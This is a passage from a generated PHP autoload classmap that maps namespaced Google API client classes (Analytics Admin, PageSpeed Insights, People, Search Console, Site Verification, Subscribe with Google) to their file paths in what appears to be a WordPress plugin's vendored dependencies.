'/google/apiclient-services/src/GoogleAnalyticsAdmin/Resource/PropertiesKeyEvents.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\Resource\\PropertiesSearchAds360Links' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/Resource/PropertiesSearchAds360Links.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\Resource\\PropertiesUserLinks' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/Resource/PropertiesUserLinks.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\Resource\\PropertiesWebDataStreams' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/Resource/PropertiesWebDataStreams.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\GoogleAnalyticsAdmin\\Resource\\PropertiesWebDataStreamsMeasurementProtocolSecrets' => $baseDir . '/google/apiclient-services/src/GoogleAnalyticsAdmin/Resource/PropertiesWebDataStreamsMeasurementProtocolSecrets.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PagespeedInsights' => $baseDir . '/google/apiclient-services/src/PagespeedInsights.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PagespeedInsights\\AuditRefs' => $baseDir . '/google/apiclient-services/src/PagespeedInsights/AuditRefs.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PagespeedInsights\\Bucket' => $baseDir . '/google/apiclient-services/src/PagespeedInsights/Bucket.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PagespeedInsights\\Categories' => $baseDir . '/google/apiclient-services/src/PagespeedInsights/Categories.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PagespeedInsights\\CategoryGroupV5' => $baseDir . '/google/apiclient-services/src/PagespeedInsights/CategoryGroupV5.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PagespeedInsights\\ConfigSettings' => $baseDir . '/google/apiclient-services/src/PagespeedInsights/ConfigSettings.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PagespeedInsights\\Environment' => $baseDir . '/google/apiclient-services/src/PagespeedInsights/Environment.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PagespeedInsights\\I18n' => $baseDir . '/google/apiclient-services/src/PagespeedInsights/I18n.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PagespeedInsights\\LhrEntity' => $baseDir . '/google/apiclient-services/src/PagespeedInsights/LhrEntity.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PagespeedInsights\\LighthouseAuditResultV5' => $baseDir . '/google/apiclient-services/src/PagespeedInsights/LighthouseAuditResultV5.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PagespeedInsights\\LighthouseCategoryV5' => $baseDir . '/google/apiclient-services/src/PagespeedInsights/LighthouseCategoryV5.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PagespeedInsights\\LighthouseResultV5' => $baseDir . '/google/apiclient-services/src/PagespeedInsights/LighthouseResultV5.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PagespeedInsights\\PagespeedApiLoadingExperienceV5' => $baseDir . '/google/apiclient-services/src/PagespeedInsights/PagespeedApiLoadingExperienceV5.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PagespeedInsights\\PagespeedApiPagespeedResponseV5' => $baseDir . '/google/apiclient-services/src/PagespeedInsights/PagespeedApiPagespeedResponseV5.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PagespeedInsights\\PagespeedVersion' => $baseDir . '/google/apiclient-services/src/PagespeedInsights/PagespeedVersion.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PagespeedInsights\\RendererFormattedStrings' => $baseDir . '/google/apiclient-services/src/PagespeedInsights/RendererFormattedStrings.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PagespeedInsights\\Resource\\Pagespeedapi' => $baseDir . '/google/apiclient-services/src/PagespeedInsights/Resource/Pagespeedapi.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PagespeedInsights\\RuntimeError' => $baseDir . '/google/apiclient-services/src/PagespeedInsights/RuntimeError.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PagespeedInsights\\StackPack' => $baseDir . '/google/apiclient-services/src/PagespeedInsights/StackPack.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PagespeedInsights\\Timing' => $baseDir . '/google/apiclient-services/src/PagespeedInsights/Timing.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PagespeedInsights\\UserPageLoadMetricV5' => $baseDir . '/google/apiclient-services/src/PagespeedInsights/UserPageLoadMetricV5.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService' => $baseDir . '/google/apiclient-services/src/PeopleService.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\Address' => $baseDir . '/google/apiclient-services/src/PeopleService/Address.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\AgeRangeType' => $baseDir . '/google/apiclient-services/src/PeopleService/AgeRangeType.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\BatchCreateContactsRequest' => $baseDir . '/google/apiclient-services/src/PeopleService/BatchCreateContactsRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\BatchCreateContactsResponse' => $baseDir . '/google/apiclient-services/src/PeopleService/BatchCreateContactsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\BatchDeleteContactsRequest' => $baseDir . '/google/apiclient-services/src/PeopleService/BatchDeleteContactsRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\BatchGetContactGroupsResponse' => $baseDir . '/google/apiclient-services/src/PeopleService/BatchGetContactGroupsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\BatchUpdateContactsRequest' => $baseDir . '/google/apiclient-services/src/PeopleService/BatchUpdateContactsRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\BatchUpdateContactsResponse' => $baseDir . '/google/apiclient-services/src/PeopleService/BatchUpdateContactsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\Biography' => $baseDir . '/google/apiclient-services/src/PeopleService/Biography.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\Birthday' => $baseDir . '/google/apiclient-services/src/PeopleService/Birthday.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\BraggingRights' => $baseDir . '/google/apiclient-services/src/PeopleService/BraggingRights.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\CalendarUrl' => $baseDir . '/google/apiclient-services/src/PeopleService/CalendarUrl.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\ClientData' => $baseDir . '/google/apiclient-services/src/PeopleService/ClientData.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\ContactGroup' => $baseDir . '/google/apiclient-services/src/PeopleService/ContactGroup.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\ContactGroupMembership' => $baseDir . '/google/apiclient-services/src/PeopleService/ContactGroupMembership.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\ContactGroupMetadata' => $baseDir . '/google/apiclient-services/src/PeopleService/ContactGroupMetadata.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\ContactGroupResponse' => $baseDir . '/google/apiclient-services/src/PeopleService/ContactGroupResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\ContactToCreate' => $baseDir . '/google/apiclient-services/src/PeopleService/ContactToCreate.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\CopyOtherContactToMyContactsGroupRequest' => $baseDir . '/google/apiclient-services/src/PeopleService/CopyOtherContactToMyContactsGroupRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\CoverPhoto' => $baseDir . '/google/apiclient-services/src/PeopleService/CoverPhoto.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\CreateContactGroupRequest' => $baseDir . '/google/apiclient-services/src/PeopleService/CreateContactGroupRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\Date' => $baseDir . '/google/apiclient-services/src/PeopleService/Date.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\DeleteContactPhotoResponse' => $baseDir . '/google/apiclient-services/src/PeopleService/DeleteContactPhotoResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\DomainMembership' => $baseDir . '/google/apiclient-services/src/PeopleService/DomainMembership.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\EmailAddress' => $baseDir . '/google/apiclient-services/src/PeopleService/EmailAddress.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\Event' => $baseDir . '/google/apiclient-services/src/PeopleService/Event.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\ExternalId' => $baseDir . '/google/apiclient-services/src/PeopleService/ExternalId.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\FieldMetadata' => $baseDir . '/google/apiclient-services/src/PeopleService/FieldMetadata.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\FileAs' => $baseDir . '/google/apiclient-services/src/PeopleService/FileAs.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\Gender' => $baseDir . '/google/apiclient-services/src/PeopleService/Gender.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\GetPeopleResponse' => $baseDir . '/google/apiclient-services/src/PeopleService/GetPeopleResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\GroupClientData' => $baseDir . '/google/apiclient-services/src/PeopleService/GroupClientData.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\ImClient' => $baseDir . '/google/apiclient-services/src/PeopleService/ImClient.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\Interest' => $baseDir . '/google/apiclient-services/src/PeopleService/Interest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\ListConnectionsResponse' => $baseDir . '/google/apiclient-services/src/PeopleService/ListConnectionsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\ListContactGroupsResponse' => $baseDir . '/google/apiclient-services/src/PeopleService/ListContactGroupsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\ListDirectoryPeopleResponse' => $baseDir . '/google/apiclient-services/src/PeopleService/ListDirectoryPeopleResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\ListOtherContactsResponse' => $baseDir . '/google/apiclient-services/src/PeopleService/ListOtherContactsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\Locale' => $baseDir . '/google/apiclient-services/src/PeopleService/Locale.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\Location' => $baseDir . '/google/apiclient-services/src/PeopleService/Location.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\Membership' => $baseDir . '/google/apiclient-services/src/PeopleService/Membership.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\MiscKeyword' => $baseDir . '/google/apiclient-services/src/PeopleService/MiscKeyword.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\ModifyContactGroupMembersRequest' => $baseDir . '/google/apiclient-services/src/PeopleService/ModifyContactGroupMembersRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\ModifyContactGroupMembersResponse' => $baseDir . '/google/apiclient-services/src/PeopleService/ModifyContactGroupMembersResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\Name' => $baseDir . '/google/apiclient-services/src/PeopleService/Name.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\Nickname' => $baseDir . '/google/apiclient-services/src/PeopleService/Nickname.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\Occupation' => $baseDir . '/google/apiclient-services/src/PeopleService/Occupation.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\Organization' => $baseDir . '/google/apiclient-services/src/PeopleService/Organization.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\PeopleEmpty' => $baseDir . '/google/apiclient-services/src/PeopleService/PeopleEmpty.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\Person' => $baseDir . '/google/apiclient-services/src/PeopleService/Person.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\PersonMetadata' => $baseDir . '/google/apiclient-services/src/PeopleService/PersonMetadata.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\PersonResponse' => $baseDir . '/google/apiclient-services/src/PeopleService/PersonResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\PhoneNumber' => $baseDir . '/google/apiclient-services/src/PeopleService/PhoneNumber.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\Photo' => $baseDir . '/google/apiclient-services/src/PeopleService/Photo.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\ProfileMetadata' => $baseDir . '/google/apiclient-services/src/PeopleService/ProfileMetadata.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\Relation' => $baseDir . '/google/apiclient-services/src/PeopleService/Relation.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\RelationshipInterest' => $baseDir . '/google/apiclient-services/src/PeopleService/RelationshipInterest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\RelationshipStatus' => $baseDir . '/google/apiclient-services/src/PeopleService/RelationshipStatus.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\Residence' => $baseDir . '/google/apiclient-services/src/PeopleService/Residence.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\Resource\\ContactGroups' => $baseDir . '/google/apiclient-services/src/PeopleService/Resource/ContactGroups.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\Resource\\ContactGroupsMembers' => $baseDir . '/google/apiclient-services/src/PeopleService/Resource/ContactGroupsMembers.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\Resource\\OtherContacts' => $baseDir . '/google/apiclient-services/src/PeopleService/Resource/OtherContacts.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\Resource\\People' => $baseDir . '/google/apiclient-services/src/PeopleService/Resource/People.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\Resource\\PeopleConnections' => $baseDir . '/google/apiclient-services/src/PeopleService/Resource/PeopleConnections.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\SearchDirectoryPeopleResponse' => $baseDir . '/google/apiclient-services/src/PeopleService/SearchDirectoryPeopleResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\SearchResponse' => $baseDir . '/google/apiclient-services/src/PeopleService/SearchResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\SearchResult' => $baseDir . '/google/apiclient-services/src/PeopleService/SearchResult.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\SipAddress' => $baseDir . '/google/apiclient-services/src/PeopleService/SipAddress.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\Skill' => $baseDir . '/google/apiclient-services/src/PeopleService/Skill.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\Source' => $baseDir . '/google/apiclient-services/src/PeopleService/Source.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\Status' => $baseDir . '/google/apiclient-services/src/PeopleService/Status.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\Tagline' => $baseDir . '/google/apiclient-services/src/PeopleService/Tagline.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\UpdateContactGroupRequest' => $baseDir . '/google/apiclient-services/src/PeopleService/UpdateContactGroupRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\UpdateContactPhotoRequest' => $baseDir . '/google/apiclient-services/src/PeopleService/UpdateContactPhotoRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\UpdateContactPhotoResponse' => $baseDir . '/google/apiclient-services/src/PeopleService/UpdateContactPhotoResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\Url' => $baseDir . '/google/apiclient-services/src/PeopleService/Url.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\PeopleService\\UserDefined' => $baseDir . '/google/apiclient-services/src/PeopleService/UserDefined.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Resource' => $baseDir . '/google/apiclient/src/Service/Resource.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole' => $baseDir . '/google/apiclient-services/src/SearchConsole.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\AmpInspectionResult' => $baseDir . '/google/apiclient-services/src/SearchConsole/AmpInspectionResult.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\AmpIssue' => $baseDir . '/google/apiclient-services/src/SearchConsole/AmpIssue.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\ApiDataRow' => $baseDir . '/google/apiclient-services/src/SearchConsole/ApiDataRow.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\ApiDimensionFilter' => $baseDir . '/google/apiclient-services/src/SearchConsole/ApiDimensionFilter.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\ApiDimensionFilterGroup' => $baseDir . '/google/apiclient-services/src/SearchConsole/ApiDimensionFilterGroup.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\BlockedResource' => $baseDir . '/google/apiclient-services/src/SearchConsole/BlockedResource.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\DetectedItems' => $baseDir . '/google/apiclient-services/src/SearchConsole/DetectedItems.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\Image' => $baseDir . '/google/apiclient-services/src/SearchConsole/Image.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\IndexStatusInspectionResult' => $baseDir . '/google/apiclient-services/src/SearchConsole/IndexStatusInspectionResult.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\InspectUrlIndexRequest' => $baseDir . '/google/apiclient-services/src/SearchConsole/InspectUrlIndexRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\InspectUrlIndexResponse' => $baseDir . '/google/apiclient-services/src/SearchConsole/InspectUrlIndexResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\Item' => $baseDir . '/google/apiclient-services/src/SearchConsole/Item.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\MobileFriendlyIssue' => $baseDir . '/google/apiclient-services/src/SearchConsole/MobileFriendlyIssue.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\MobileUsabilityInspectionResult' => $baseDir . '/google/apiclient-services/src/SearchConsole/MobileUsabilityInspectionResult.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\MobileUsabilityIssue' => $baseDir . '/google/apiclient-services/src/SearchConsole/MobileUsabilityIssue.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\ResourceIssue' => $baseDir . '/google/apiclient-services/src/SearchConsole/ResourceIssue.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\Resource\\Searchanalytics' => $baseDir . '/google/apiclient-services/src/SearchConsole/Resource/Searchanalytics.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\Resource\\Sitemaps' => $baseDir . '/google/apiclient-services/src/SearchConsole/Resource/Sitemaps.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\Resource\\Sites' => $baseDir . '/google/apiclient-services/src/SearchConsole/Resource/Sites.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\Resource\\UrlInspection' => $baseDir . '/google/apiclient-services/src/SearchConsole/Resource/UrlInspection.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\Resource\\UrlInspectionIndex' => $baseDir . '/google/apiclient-services/src/SearchConsole/Resource/UrlInspectionIndex.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\Resource\\UrlTestingTools' => $baseDir . '/google/apiclient-services/src/SearchConsole/Resource/UrlTestingTools.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\Resource\\UrlTestingToolsMobileFriendlyTest' => $baseDir . '/google/apiclient-services/src/SearchConsole/Resource/UrlTestingToolsMobileFriendlyTest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\RichResultsInspectionResult' => $baseDir . '/google/apiclient-services/src/SearchConsole/RichResultsInspectionResult.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\RichResultsIssue' => $baseDir . '/google/apiclient-services/src/SearchConsole/RichResultsIssue.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\RunMobileFriendlyTestRequest' => $baseDir . '/google/apiclient-services/src/SearchConsole/RunMobileFriendlyTestRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\RunMobileFriendlyTestResponse' => $baseDir . '/google/apiclient-services/src/SearchConsole/RunMobileFriendlyTestResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\SearchAnalyticsQueryRequest' => $baseDir . '/google/apiclient-services/src/SearchConsole/SearchAnalyticsQueryRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\SearchAnalyticsQueryResponse' => $baseDir . '/google/apiclient-services/src/SearchConsole/SearchAnalyticsQueryResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\SitemapsListResponse' => $baseDir . '/google/apiclient-services/src/SearchConsole/SitemapsListResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\SitesListResponse' => $baseDir . '/google/apiclient-services/src/SearchConsole/SitesListResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\TestStatus' => $baseDir . '/google/apiclient-services/src/SearchConsole/TestStatus.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\UrlInspectionResult' => $baseDir . '/google/apiclient-services/src/SearchConsole/UrlInspectionResult.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\WmxSite' => $baseDir . '/google/apiclient-services/src/SearchConsole/WmxSite.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\WmxSitemap' => $baseDir . '/google/apiclient-services/src/SearchConsole/WmxSitemap.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SearchConsole\\WmxSitemapContent' => $baseDir . '/google/apiclient-services/src/SearchConsole/WmxSitemapContent.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SiteVerification' => $baseDir . '/google/apiclient-services/src/SiteVerification.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SiteVerification\\Resource\\WebResource' => $baseDir . '/google/apiclient-services/src/SiteVerification/Resource/WebResource.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SiteVerification\\SiteVerificationWebResourceGettokenRequest' => $baseDir . '/google/apiclient-services/src/SiteVerification/SiteVerificationWebResourceGettokenRequest.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SiteVerification\\SiteVerificationWebResourceGettokenRequestSite' => $baseDir . '/google/apiclient-services/src/SiteVerification/SiteVerificationWebResourceGettokenRequestSite.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SiteVerification\\SiteVerificationWebResourceGettokenResponse' => $baseDir . '/google/apiclient-services/src/SiteVerification/SiteVerificationWebResourceGettokenResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SiteVerification\\SiteVerificationWebResourceListResponse' => $baseDir . '/google/apiclient-services/src/SiteVerification/SiteVerificationWebResourceListResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SiteVerification\\SiteVerificationWebResourceResource' => $baseDir . '/google/apiclient-services/src/SiteVerification/SiteVerificationWebResourceResource.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SiteVerification\\SiteVerificationWebResourceResourceSite' => $baseDir . '/google/apiclient-services/src/SiteVerification/SiteVerificationWebResourceResourceSite.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SubscribewithGoogle' => $baseDir . '/google/apiclient-services-subscribewithgoogle/SubscribewithGoogle.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SubscribewithGoogle\\BusinessPredicates' => $baseDir . '/google/apiclient-services-subscribewithgoogle/SubscribewithGoogle/BusinessPredicates.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SubscribewithGoogle\\CanceledDetails' => $baseDir . '/google/apiclient-services-subscribewithgoogle/SubscribewithGoogle/CanceledDetails.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SubscribewithGoogle\\Entitlement' => $baseDir . '/google/apiclient-services-subscribewithgoogle/SubscribewithGoogle/Entitlement.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SubscribewithGoogle\\ListEntitlementsResponse' => $baseDir . '/google/apiclient-services-subscribewithgoogle/SubscribewithGoogle/ListEntitlementsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SubscribewithGoogle\\ListPublicationsResponse' => $baseDir . '/google/apiclient-services-subscribewithgoogle/SubscribewithGoogle/ListPublicationsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SubscribewithGoogle\\ListUserEntitlementsPlansResponse' => $baseDir . '/google/apiclient-services-subscribewithgoogle/SubscribewithGoogle/ListUserEntitlementsPlansResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SubscribewithGoogle\\Money' => $baseDir . '/google/apiclient-services-subscribewithgoogle/SubscribewithGoogle/Money.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SubscribewithGoogle\\Order' => $baseDir . '/google/apiclient-services-subscribewithgoogle/SubscribewithGoogle/Order.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SubscribewithGoogle\\PaymentOptions' => $baseDir . '/google/apiclient-services-subscribewithgoogle/SubscribewithGoogle/PaymentOptions.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SubscribewithGoogle\\PlanEntitlement' => $baseDir . '/google/apiclient-services-subscribewithgoogle/SubscribewithGoogle/PlanEntitlement.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SubscribewithGoogle\\Product' => $baseDir . '/google/apiclient-services-subscribewithgoogle/SubscribewithGoogle/Product.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SubscribewithGoogle\\Publication' => $baseDir . '/google/apiclient-services-subscribewithgoogle/SubscribewithGoogle/Publication.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SubscribewithGoogle\\PublicationPredicates' => $baseDir . '/google/apiclient-services-subscribewithgoogle/SubscribewithGoogle/PublicationPredicates.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SubscribewithGoogle\\PurchaseInfo' => $baseDir . '/google/apiclient-services-subscribewithgoogle/SubscribewithGoogle/PurchaseInfo.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SubscribewithGoogle\\Reader' => $baseDir . '/google/apiclient-services-subscribewithgoogle/SubscribewithGoogle/Reader.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SubscribewithGoogle\\RecurrenceDuration' => $baseDir . '/google/apiclient-services-subscribewithgoogle/SubscribewithGoogle/RecurrenceDuration.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SubscribewithGoogle\\RecurrenceTerms' => $baseDir . '/google/apiclient-services-subscribewithgoogle/SubscribewithGoogle/RecurrenceTerms.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SubscribewithGoogle\\RecurringPlanDetails' => $baseDir . '/google/apiclient-services-subscribewithgoogle/SubscribewithGoogle/RecurringPlanDetails.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SubscribewithGoogle\\Resource\\Publications' => $baseDir . '/google/apiclient-services-subscribewithgoogle/SubscribewithGoogle/Resource/Publications.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SubscribewithGoogle\\Resource\\PublicationsEntitlements' => $baseDir . '/google/apiclient-services-subscribewithgoogle/SubscribewithGoogle/Resource/PublicationsEntitlements.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SubscribewithGoogle\\Resource\\PublicationsReaders' => $baseDir . '/google/apiclient-services-subscribewithgoogle/SubscribewithGoogle/Resource/PublicationsReaders.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SubscribewithGoogle\\Resource\\PublicationsReadersEntitlementsplans' => $baseDir . '/google/apiclient-services-subscribewithgoogle/SubscribewithGoogle/Resource/PublicationsReadersEntitlementsplans.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SubscribewithGoogle\\Resource\\PublicationsReadersOrders' => $baseDir . '/google/apiclient-services-subscribewithgoogle/SubscribewithGoogle/Resource/PublicationsReadersOrders.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SubscribewithGoogle\\StateDetails' => 